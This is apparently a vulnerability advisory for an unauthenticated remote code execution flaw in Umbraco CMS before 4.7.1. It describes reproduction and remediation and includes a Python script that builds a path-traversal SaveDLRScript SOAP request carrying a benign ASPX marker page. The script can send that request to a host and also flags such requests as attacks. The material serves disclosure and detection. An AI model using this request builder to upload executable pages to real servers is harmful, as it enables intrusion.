Umbraco CMS Unauthenticated Remote Code Execution Vulnerability

Vulnerability

A remote code execution vulnerability has been identified in Umbraco CMS versions prior to 4.7.1. The flaw lies in the codeEditorSave.asmx SOAP endpoint, whose SaveDLRScript operation accepts file uploads without requiring authentication. The fileName parameter of that operation is not validated against path traversal, so an attacker can write an attacker-supplied ASPX script into the web-accessible /umbraco/ directory and then execute it simply by requesting it over HTTP.

Impact

Exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary code on the server hosting Umbraco CMS, with the privileges of the web application process.

Reproduction

The vulnerability can be reproduced by sending a SOAP request to the codeEditorSave.asmx endpoint that invokes the SaveDLRScript operation. The fileName parameter must contain path traversal sequences so that the file is written into the /umbraco/ directory instead of the script folder the operation is meant to manage, and the fileContents parameter carries the ASPX script. Requesting the uploaded file over HTTP then causes the server to compile and run it, which demonstrates code execution.

Remediation

Users are advised to upgrade to Umbraco CMS version 4.7.1 or later, and to apply security patches promptly. Until the upgrade is applied, restrict network access to the /umbraco/ path (which includes the codeEditorSave.asmx endpoint), and review the /umbraco/ directory and web server logs for unexpected .aspx files or POST requests to codeEditorSave.asmx, since a successful upload leaves the script on disk.
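The following Python script is an added illustration for this advisory, not Umbraco code or code from the original page. It builds the SaveDLRScript SOAP envelope described under Reproduction (with a benign marker page rather than a shell as the payload) and provides the request-level check a defender would run on captured traffic while waiting for the upgrade described under Remediation: any SaveDLRScript call whose fileName escapes the script folder or names an ASP.NET-executable extension is flagged. The service namespace http://tempuri.org/, the element names fileName, oldName, fileContents and ignoreDebugging, the endpoint path /umbraco/webservices/codeEditorSave.asmx and the SOAPAction header value are assumptions not stated on the page; the sample requests are constructed.

```python
"""Build and inspect SaveDLRScript requests to codeEditorSave.asmx.

Added illustration for this advisory, not Umbraco code. Assumed (not stated
on the page): the service namespace http://tempuri.org/, the element names
fileName / oldName / fileContents / ignoreDebugging, the endpoint path
/umbraco/webservices/codeEditorSave.asmx and the SOAPAction header value.
"""
import re
import xml.etree.ElementTree as ET
from urllib import request

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "http://tempuri.org/"                                # assumed ASMX default namespace
DEFAULT_PATH = "/umbraco/webservices/codeEditorSave.asmx"    # assumed endpoint path

# ".." bounded by a separator or the string edge, in either slash style
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# extensions IIS hands to the ASP.NET runtime; DLR scripts should be .py/.rb
EXECUTABLE = (".aspx", ".ashx", ".asmx", ".ascx")


def build_save_dlr_script(file_name: str, contents: str) -> bytes:
    """SOAP 1.1 envelope invoking SaveDLRScript with the supplied fileName."""
    ET.register_namespace("soap", SOAP_NS)
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    op = ET.SubElement(body, f"{{{SVC_NS}}}SaveDLRScript")
    ET.SubElement(op, f"{{{SVC_NS}}}fileName").text = file_name
    ET.SubElement(op, f"{{{SVC_NS}}}oldName").text = ""
    ET.SubElement(op, f"{{{SVC_NS}}}fileContents").text = contents
    ET.SubElement(op, f"{{{SVC_NS}}}ignoreDebugging").text = "true"
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def _local(tag: str) -> str:
    """Strip the namespace from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def inspect_request(body: bytes) -> dict:
    """Pull the SaveDLRScript fileName out of a request body and grade it."""
    result = {"operation": None, "file_name": None,
              "traversal": False, "executable": False}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:          # not XML at all: nothing to grade
        return result
    for el in root.iter():
        if _local(el.tag) != "SaveDLRScript":
            continue
        name = next((c.text or "" for c in el if _local(c.tag) == "fileName"), "")
        result.update(
            operation="SaveDLRScript",
            file_name=name,
            # relative traversal, absolute path, or a drive letter all escape the folder
            traversal=bool(TRAVERSAL.search(name))
            or name.startswith(("/", "\\")) or ":" in name,
            executable=name.lower().endswith(EXECUTABLE),
        )
        break
    return result


def is_exploit_attempt(body: bytes) -> bool:
    """True when the request escapes the script folder or drops ASP.NET code."""
    r = inspect_request(body)
    return r["operation"] == "SaveDLRScript" and (r["traversal"] or r["executable"])


def send(base_url: str, body: bytes, path: str = DEFAULT_PATH) -> int:
    """POST the envelope to a host you are authorised to test; returns HTTP status."""
    req = request.Request(base_url.rstrip("/") + path, data=body, method="POST",
                          headers={"Content-Type": "text/xml; charset=utf-8",
                                   "SOAPAction": SVC_NS + "SaveDLRScript"})  # assumed
    with request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    # constructed samples: a legitimate DLR script save and a traversal attempt
    benign = build_save_dlr_script("hello.py", "print 'hi'")
    marker = build_save_dlr_script("..\\..\\probe.aspx",
                                   '<%@ Page Language="C#" %><%= "probe-ok" %>')
    for sample in (benign, marker):
        print(inspect_request(sample)["file_name"], "->", is_exploit_attempt(sample))
```

The detector deliberately flags on two independent signals: a fileName that escapes the script folder, and a fileName with an extension the ASP.NET runtime will execute. Either alone is enough to treat the request as hostile, because a legitimate DLR script save needs neither.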

Added: Sep 1, 2025, 7:22 PM
Updated: Sep 1, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm
spread: 6.4
impact: 7.5
exploitability: 9.7
remediation: 0.0
relevance: 0.3
threat: 7.9
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.